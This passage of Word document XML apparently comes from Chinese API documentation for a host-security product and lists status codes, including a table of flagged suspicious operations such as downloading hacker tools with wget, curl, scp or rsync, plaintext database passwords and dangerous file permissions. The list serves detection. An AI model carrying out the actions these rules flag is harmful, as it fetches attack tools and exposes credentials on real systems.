          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A578C5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A55696D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45E2595D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="178B0D8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C934F48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49BA667E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="296" w:name="可疑操作审核状态"/>
      <w:bookmarkEnd w:id="295"/>
      <w:r>
        <w:t>可疑操作审核状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1298"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4CD70E1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EFADF32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49513876" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BEFE2A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5DE273E1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71435D24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auditStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40592C68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38097536" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6150CF3A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="538461B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auditStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18A5A7AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="261DD3BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>审核通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E99862A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="742ACE8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auditStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2942889C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="787F818A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>审核未通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72BCDCFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="297" w:name="可疑操作类型"/>
      <w:bookmarkEnd w:id="296"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可疑操作类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="54879599"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5276A6AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CE55A39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75C2FD98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CF5ECF8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7082DF47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67BC98AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="493A4F02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未命中规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="36EE29A6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6190DFDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE88E68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DABE7F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bash危险命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CA06E41" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69C08D02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AEE7F6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A9AB862" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Wget下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="02882F0E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21B2879C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="590936E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="518BFD7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>curl下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29E85C38" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D81D79F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3939B6B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7622A387" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rcp下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1305E6DA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="522692A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD5075B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0387FD1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>scp下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12E68A69" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6475FE34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DA5F5E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02D72657" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rsync下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="386AB7F5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31589778" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EB79F5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5569017B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>MYSQL明文密码显示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A502FD0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="711FF789" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7268322F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="225A392D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Mongo明文密码显示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3F378DE4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71472ECD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52DB7292" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C72DDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>scp外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31ABB214" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="514B416A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F195453" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19C4E5AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rcp外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EB3C797" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22DB84C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A80B1A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="162B85AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rsync外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47401FEE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71FCB6DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06FFE8F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22984948" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>赋给目录或文件危险权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0215BFF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="298" w:name="暴力破解封停状态"/>
      <w:bookmarkEnd w:id="297"/>
      <w:r>
        <w:t>暴力破解封停状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="727"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="594C05B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771F352" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0990580D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018EAB3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="21D2A137" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="548362E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F75B957" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="725429C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未处理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E38FE22" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="287F7534" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CC00489" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D7AE1E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自动封停</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A7D2315" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B7A466D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CECA8E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E186F93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自动解封</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69703FD0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DB7BDD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF99E97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F45F260" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>手动封停</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61EA001E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
